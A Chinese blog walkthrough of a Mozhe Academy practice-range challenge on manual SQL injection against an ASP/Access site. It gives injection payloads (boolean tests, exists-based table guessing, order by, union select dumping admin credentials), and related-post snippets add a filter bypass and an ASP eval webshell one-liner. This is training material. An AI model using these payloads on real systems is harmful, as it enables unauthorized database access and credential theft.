【墨者学院】SQL手工注入漏洞测试(Access数据库)

最新推荐文章于 2023-01-25 23:18:05 发布
最新推荐文章于 2023-01-25 23:18:05 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 在线靶场 文章标签: 墨者学院 accesss数据库 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43884770/article/details/84789843
版权
背景介绍

安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解Access的数据结构;
4.了解字符串的MD5加解密;

解题方向

手工进行SQL注入测试,获取管理密码登录。
在这里插入图片描述

1、判断注入点:

分别用and 1=1和and 1=2测试,发现1=1的时候页面没有变化,1=2的时候页面发生变化,说明存在数字型注入。

2、猜表名:
id=1 and exists(select * from admin)    //页面返回正常,说明存在admin表
3、猜列名:
id=1 and exists(select username from admin)     //页面返回正常,说明存在username列
id=1 and exists(select passwd from admin)   //页面返回正常,说明存在passwd列
4、判断某个id对应的列数:
id=1 order by 4    //显示正常
id=1 order by 5   //显示不正常,说明数据库字段是4
5、判断某个id对应的列数:
id=1 union select 1,username,passwd,4 from admin

在这里插入图片描述

最后解密MD5登录后台获取key值。
在这里插入图片描述

凉拌花生米
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL手工注入漏洞测试Access数据库墨者学院靶场
ISNS的博客
07-09 1475
靶场: https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe 1.点击滚动的通知。 点击后进入页面: 2.判断是否为注入点。 3.判断字段数量。 采用二分法,从10开始查询。结果显示有4个字段: 因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名。 4.猜...
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
T1ngSh0w的博客
09-07 1240
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
SQL手工注入漏洞测试(MySQL数据库)
chinacqzgp的博客
09-18 1746
墨者学院靶场sql注入,MySQL数据库
墨者学院05 SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_42789937的博客
01-25 277
墨者学院05 SQL手工注入漏洞测试(MySQL数据库-字符型),看见SQL内心已经没什么波澜...
SQL手工注入漏洞测试(Access数据库)
asd158923328的博客
08-20 436
靶场地址: https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe 根据题意 进入页面,发现注入点 利用and 1=1 =1正常,and 1=2 出现报错说明有注入点 猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果不...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 v3.7.2.9
03-12
3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人...
SQL手工注入漏洞测试(MySQL数据库-字符型)
qq_45883601的博客
12-07 410
进入靶场环境,两个墨币没了。。 然后点击公告,开始手工注入。 1、首先判断是否存在注入点, http://219.153.49.228:47679/new_list.php?id=tingjigonggao%20and%201=1 页面错误,存在注入点,接着用联合查询 ...
墨者学院 - SQL手工注入漏洞测试(Access数据库)
多崎巡礼的博客
07-26 943
进入公告找到注入点 地址输入 and 1=1 =1正常,and 1=2 出现报错说明有注入点。 3.猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果不是的话可以继续猜,格式为:and exists (select * from 表名),运行不报错,说明就是存在这个admin表了。 4.猜测这个表里面有哪些字段:order ...
墨者学院 - SQL过滤字符后手工注入漏洞测试(第1题)
多崎巡礼的博客
09-28 2677
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了; (过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧) 和以往的套路一样,猜得到字段是4个。。。 http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4 url编码构造如...
04#墨者靶场-SQL手工注入漏洞测试(Access数据库)
shy的博客
11-15 285
墨者靶场4 By/shy014 确定列数,为4列 确定存在admin表 http://219.153.49.228:47368/new_list....
墨者学院 - SQL注入实战(防注入)-Access
多崎巡礼的博客
09-04 1504
使用御剑扫描,发现sqlin.asp文件,打开发现是乱码 必应一下 access通用防注入系统也可以知道注入信息会被记录到sqlin.asp中,这相当于一个文件上传漏洞,可以直接在sqlin.asp中写入一句话 在url后面添加一句话代码and 1=<%eval request("chopper")%>,在回显的信息中发现被记录的注入信息只有and 1=,后面的一句话被过滤了 ...
墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型)
Fisher
12-02 691
写在前面: 最近准备从头再来过一遍sql,所以开始刷墨者学院的题目。 这是一道最简单的字符型 联合注入题目 目的:拿到用户与密码 首先寻找注入点,我们发现在维护界面存在id字段可能存在注入。 1.找闭合字符 首先尝试寻找闭合字符,当输入‘时界面加载正确 可能是’,接着测试 and 1=1 界面正确,and1=2 界面错误 没错说明确实闭合字符是单引号。 当然需要–+起到闭合后面闭合字符的作用。 接下来用order by 判断有多少列 order by 1时正确 order by 5 时错误说明共4列
sql注入漏洞的三种类型及演示
Imageel的博客
03-24 5993
1.数字型注入 首先还是根据之前的操作先后打开phpstudy,firefox以及burpsuite 在pikachu中选中sql-inject中的数字型注入,然后点击一下1或任意userid,让burpsuite抓到这部操作的数据包 将抓到的数据包传到repeater。 在传入的id处加入数字型注入的关键 id=1 or 1=1.此操作将其默认判断为真 在render处即可发现所有的user...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值